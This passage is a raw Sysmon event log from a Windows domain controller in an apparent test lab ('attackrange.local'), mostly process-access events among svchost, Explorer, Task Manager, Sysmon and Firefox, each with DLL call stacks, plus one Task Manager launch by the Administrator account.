9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204824Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204823Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204822Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204821Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204820Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204819Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204818Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-84F7-6019-4105-00000000A301}36005040C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204817Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204816Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-84F7-6019-4105-00000000A301}36002088C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204815Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F7-6019-4105-00000000A301}36005040C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204814Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F7-6019-4105-00000000A301}36005040C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204813Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F7-6019-4105-00000000A301}36005040C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204812Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F6-6019-3B05-00000000A301}31764480C:\Windows\system32\taskhostw.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204811Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F6-6019-3B05-00000000A301}31764480C:\Windows\system32\taskhostw.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204810Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204809Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204808Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204807Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204806Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-7CBF-6019-1600-00000000A301}15281824C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204805Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.739{29E67E80-7CBF-6019-1600-00000000A301}15281572C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204804Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.723{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204803Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.723{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204802Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.723{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204801Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.723{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204800Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.723{29E67E80-84F4-6019-2C05-00000000A301}19281400C:\Windows\system32\csrss.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204799Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.723{29E67E80-84F7-6019-4105-00000000A301}36007068C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x8000000000000000204798Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.722{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\System32\Taskmgr.exe1, 0, 0, 1Task ManagerTask ManagerMicrosoft® Windows® Operating SystemTaskmgr.exe"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=F4429ADA273FF82A9D1EC804018A0039,SHA256=1BB6FBFFBDB585DE220DB58BAAB9327E5FF03E53AE88CBCAFF777A7819044615,IMPHASH=65D7A86C4F0360F63A506C4247D3E410{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x8000000000000000205105Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:53.223{29E67E80-7CBF-6019-0D00-00000000A301}6285784C:\Windows\system32\svchost.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205104Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:53.223{29E67E80-7CBF-6019-0D00-00000000A301}6285784C:\Windows\system32\svchost.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205108Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:54.690{29E67E80-84F7-6019-4105-00000000A301}3600928C:\Windows\Explorer.EXE{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80395A558D8)|UNKNOWN(FFFFFDAC0E4B4998)|UNKNOWN(FFFFFDAC0E4B4B17)|UNKNOWN(FFFFFDAC0E4AF1A1)|UNKNOWN(FFFFFDAC0E4B0B6A)|UNKNOWN(FFFFFDAC0E4AEE26)|UNKNOWN(FFFFF8039576CE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000205107Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:54.690{29E67E80-84F7-6019-4105-00000000A301}3600928C:\Windows\Explorer.EXE{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla 